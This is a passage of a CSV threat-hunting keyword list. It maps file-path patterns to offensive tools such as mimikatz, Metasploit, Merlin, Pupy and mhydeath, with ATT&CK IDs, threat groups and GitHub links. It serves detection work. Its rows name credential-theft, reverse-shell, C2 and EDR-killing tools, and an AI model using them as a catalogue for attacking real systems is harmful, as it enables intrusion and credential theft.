APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*/merlin.dll*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP 
Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/metasploit-framework/embedded/framework*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/metatwin.git*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/meterpreter/reverse_tcp*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/MFASweep.git*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/michaelweber/Macrome*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/micr0%20shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*/micr0_shell.git*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*/mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mimipenguin.c*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mimipenguin/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" 
+"*/mimipenguin/*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mimishim/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
